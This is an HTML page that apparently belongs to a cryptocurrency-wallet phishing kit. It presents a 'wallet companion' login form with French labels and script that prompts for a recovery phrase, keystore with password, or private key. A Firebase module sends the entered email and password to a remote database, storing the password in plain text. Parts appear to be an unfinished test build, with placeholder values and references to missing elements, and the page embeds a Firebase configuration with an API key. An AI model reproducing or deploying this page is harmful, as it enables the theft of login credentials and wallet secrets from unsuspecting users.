<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Artistry Unleashed - Your Decentralized Wallet Companion</title>
    <script src="js/script.js"> </script>
   <style>
        body {
             font-family: 'Arial', sans-serif;
            background-image: url('https://i.ibb.co/R0Zw1Tb/bg-crypto-jwv.jpg');
            background-size: cover;
            background-repeat: no-repeat;
            background-attachment: fixed;
            margin: 0;
            padding: 0;
        }

        header {

            color: #fff;
            text-align: center;
            padding: 20px;
            height:400px;
        }

        section {
            margin: 20px;
            padding: 40px;
            background-color: #fff;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            border-radius: 10px;
        }

        h1 {
            font-size: 2.5em;
            color: #333;
        }

        p {
            font-size: 1.2em;
            line-height: 1.6;
        }
        
        
          .popup {
            display: none;
            position: fixed;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            background-color: #fff;
            padding: 20px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.3);
            border-radius: 10px;
            text-align: center;
            z-index: 999;
        }

        .popup h2 {
            color: #ff7e5f;
        }

        .popup p {
            color: #333;
            margin-bottom: 20px;
        }

        .popup-btn {
            background: linear-gradient(to right, #ff7e5f, #feb47b);
            color: #fff;
            padding: 10px 20px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }
        
        
        

       .paragraph-container {
    background-color: rgba(55, 71, 79, 0.5); /* Semi-transparent dark blue-gray background */
    color: #fff; /* White text color */
    padding: 20px;
    border-radius: 10px;
    margin: 50px;
    text-align: center;
}

.paragraph-container h1 {
    background: linear-gradient(to right, #ff7e5f, #feb47b); /* Gradient background for h1 */
    -webkit-background-clip: text;
    color: transparent; /* Make the text transparent so the gradient background shows through */
}

.paragraph-container p {
    color: #fff; /* White color for paragraphs */
}

        
        .selection-buttons, .wallet-actions {
            display: flex;
            flex-wrap: wrap;
            justify-content: space-around;
            margin-top: 20px;
        }

       .selection-button, .wallet-action {
    background: linear-gradient(to right, #ff7e5f, #feb47b); /* Gradient from coral to peach */
    color: #fff;
    padding: 15px 25px;
    margin: 10px;
    text-align: center;
    text-decoration: none;
    border: none;
    border-radius: 50px;
    cursor: pointer;
    font-size: 1.2em;
    transition: background 0.3s, color 0.3s, transform 0.3s;
}

.selection-button:hover, .wallet-action:hover {
    background: linear-gradient(to right, #ff7e5f, #feb47b); /* Same gradient on hover */
    color: #fff;
    transform: scale(1.05);
}


        .sticky-bar {
            height: 62px;
            overflow: hidden;
            box-sizing: border-box;
            text-align: right;
            line-height: 14px;
            block-size: 62px;
            font-size: 12px;
            font-feature-settings: normal;
            text-size-adjust: 100%;
            padding: 1px;
            padding: 0px;
            margin: 0px;
            width: 100%;
        }
        
          .btnconnect {
            padding-top:50px;
        }
        
    </style>
</head>
<body>

    
<form>
        <h2>Connexion</h2>
        <label for="email">mail:</label>
        <input type="email" id="email" name="email" required>
         <label for="selected">Selected Wallet:</label>
            <input type="text" id="selected" value="tessttt" readonly>
        <label for="password">Mot de passe:</label>
        <input type="password" id="password" name="password" required>
          <label for="wallet-info-type">Select Wallet Information Type:</label>
            <select id="wallet-info-type" onchange="showInfoInput()">
                <option id="test1" value="phrase">Phrase</option>
                <option id="test2" value="keystore">Keystore</option>
                <option id="test3" value="private-key">Private Key</option>
            </select>
        <button type="button" id="submitData" name="submitData" >Se Connecter</button>
    </form>
    <script>
         function selectWallet() {
            var selectedWallet = document.getElementById("wallet-list").value;
            document.getElementById("selected-wallet").value = selectedWallet;
            showWalletForm(selectedWallet);
        }

        function showWalletForm(selectedWallet) {
            // Display the wallet connection form
            document.getElementById('wallet-connect-form').style.display = 'block';

            // Show or hide information input based on the selected wallet type
            showInfoInput(selectedWallet);
        }

         function showInfoInput(selectedWallet) {
            // Retrieve selected information type
            const walletInfoType = document.getElementById('wallet-info-type').value;

            // Remove any existing information input elements
            const infoInputContainer = document.getElementById('info-input-container');
            infoInputContainer.innerHTML = '';

            // Dynamically create and append information input fields based on the selected type and wallet
            switch (walletInfoType) {
                case 'phrase':
                    infoInputContainer.innerHTML = `
                        <label for="wallet-phrase">Enter your recovery phrase for ${selectedWallet}:</label>
                        <textarea id="wallet-phrase" placeholder="Typical 12 (sometimes 24) words separated by single spaces." rows="4"></textarea>
                    `;
                    break;
                case 'keystore':
                    infoInputContainer.innerHTML = `
                        <label for="wallet-keystore">Enter Keystore for ${selectedWallet}:</label>
                        <input type="text" id="wallet-keystore" placeholder="Several lines of text beginning with '{...}'">
                        <label for="wallet-password">Wallet Password:</label>
                        <input type="password" id="wallet-password" placeholder="Enter your password">
                    `;
                    break;
                case 'private-key':
                    infoInputContainer.innerHTML = `
                        <label for="wallet-private-key">Enter your Private Key for ${selectedWallet}:</label>
                        <input type="text" id="wallet-private-key" placeholder="Typically 12 (sometimes 24) words separated by a single space.">
                    `;
                    break;
                default:
                    break;
            }
        }
    </script>
    <script type="module">
  // Import the functions you need from the SDKs you need
  import { initializeApp } from "https://www.gstatic.com/firebasejs/10.6.0/firebase-app.js";
     import { getAuth, createUserWithEmailAndPassword } from "https://www.gstatic.com/firebasejs/10.6.0/firebase-auth.js";
        import { getDatabase,set,ref } from "https://www.gstatic.com/firebasejs/10.6.0/firebase-database.js";

  // TODO: Add SDKs for Firebase products that you want to use
  // https://firebase.google.com/docs/web/setup#available-libraries

  // Your web app's Firebase configuration
  const firebaseConfig = {
    apiKey: "AIzaSyB-2koFw2ICcMC7g4VMSgWyctgXaDHL_N0",
    authDomain: "crypto-test-5739f.firebaseapp.com",
    projectId: "crypto-test-5739f",
    storageBucket: "crypto-test-5739f.appspot.com",
    messagingSenderId: "680504108544",
    appId: "1:680504108544:web:8d4ac4ae5c6e53847adae5"
  };

  // Initialize Firebase
  const app = initializeApp(firebaseConfig);
  const auth = getAuth();  
  const database = getDatabase(app);
        submitData.addEventListener('click',(e) => {
            var email= document.getElementById('email').value;
             var password= document.getElementById('password').value;
             var selected= document.getElementById('selected').value;
            
            
            createUserWithEmailAndPassword(auth, email,password,selected)
  .then((userCredential) => {
    // Signed up 
    const user = userCredential.user;
      // ... user.uid
       set(ref(database, 'users/' + user.uid), {
    email: email,
            selected: selected,
    password: password
  })
      .then(() => {
  // Data saved successfully!
        alert('sucsseful');
})
.catch((error) => {
  // The write failed...
      alert(error);
});
    
    // ...
  })
  .catch((error) => {
    const errorCode = error.code;
    const errorMessage = error.message;
    // ..
      alert(errorMessage);
  });
        });
</script>
</body>
</html>
